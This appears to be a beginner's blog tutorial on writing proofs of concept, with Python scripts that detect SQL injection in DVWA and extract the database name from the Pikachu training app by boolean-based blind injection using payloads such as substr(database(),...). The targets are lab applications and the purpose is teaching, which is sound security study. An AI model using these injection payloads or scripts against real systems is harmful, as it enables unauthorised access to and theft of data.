Preliminary discussion on writing PoCs
2022-07-23 21:48:00 【sec0nd_】
Preface
I want to exercise my programming ability; a senior said it will be very important later on, so I had better learn it well.
But I also want to learn some security, so I will practise by writing PoCs.
What is a PoC?
PoC (full name: Proof of Concept), translated into Chinese as 概念验证. In the security world you can understand it as a vulnerability verifier (in this tutorial, unless stated otherwise, PoC means a vulnerability verifier by default). Of course, if you insist that I am wrong, I certainly support you; I am not going to argue either way. Compared with a real application, a PoC is an incomplete program: just a piece of code that proves the author's point. Because it is only a code snippet, I have never seen a book about how to write PoCs; for people who can already write code it is a matter of minutes, and they would wonder why anyone would publish a book about it.
What is an Exp?
Exp (full name: Exploit), called a vulnerability exploiter (漏洞利用程序) in Chinese. The name says it all: in short, it is a program that turns a vulnerability into something of value, which admittedly still sounds vague. Imagine this scene: a target has a SQL injection hole, you know about it, and you write a program that goes through that SQL injection to obtain privileges on the target. That program is the Exp. Of course, if you never exploit the vulnerability and it just sits there, then for you that vulnerability can be considered worthless.
Things to note when writing a PoC
- Randomness: the parameters should be randomised where possible (sometimes they cannot be); a fixed payload is a signature that is easy to block and can also match by accident.
- Generality: it targets every site that runs the same component, not one individual website.
- Determinism: it must establish clearly whether the vulnerability exists, so the check should not hinge on something that could be true for unrelated reasons.
Trying to write a first PoC
DVWA SQL injection PoC
Append a ' to the id parameter in the URL yourself; the PoC can only judge from the returned page, and here it looks for a MySQL syntax error message.
import requests
import re

# Cookie from a logged-in DVWA session (PHPSESSID and security=low), filled in by hand
header = {"Cookie": ""}
url = input("Please enter url")        # e.g. .../vulnerabilities/sqli/?id=1'&Submit=Submit
r = requests.get(url, headers=header)
res = r.text
# DVWA at the low level echoes the MySQL error, which contains the word "syntax"
if re.search("syntax", res):
    print("SQL injection exists")
else:
    print("No SQL injection")
Pikachu boolean-based blind SQL injection PoC
import requests
import string

url = "http://192.168.186.128/pikachu/vul/sqli/sqli_blind_b.php"
submit = "查询"   # value of the form's submit button on the pikachu page

def page_len(name):
    # requests URL-encodes the quote, spaces, '=' and '#' in the injected value
    return len(requests.get(url, params={"name": name, "submit": submit}).text)

# Response length for a valid user: a true injected condition returns the same
# page, a false one returns the "user does not exist" page, so the length is the oracle
normalhtmllen = page_len("kobe")
print("the len of HTML:", normalhtmllen)

#------------ Determine the length of the database name --------------------------------
dbNameLen = 0
while True:
    if page_len("kobe' and length(database())=%d#" % dbNameLen) == normalhtmllen:
        print("The len of dbName", dbNameLen)
        break
    if dbNameLen == 200:
        print("Error!")
        raise SystemExit(1)
    dbNameLen += 1
#-----------------------------------------------------------------

#--- Use substr() with the obtained length to recover the database name one character at a time ------
charset = string.ascii_lowercase + string.digits + "_"   # database names may contain digits and underscores too
dbName = ""
for i in range(1, dbNameLen + 1):
    for a in charset:
        if page_len("kobe' and substr(database(),%d,1)='%s'#" % (i, a)) == normalhtmllen:
            dbName += a
            print(dbName)
            break
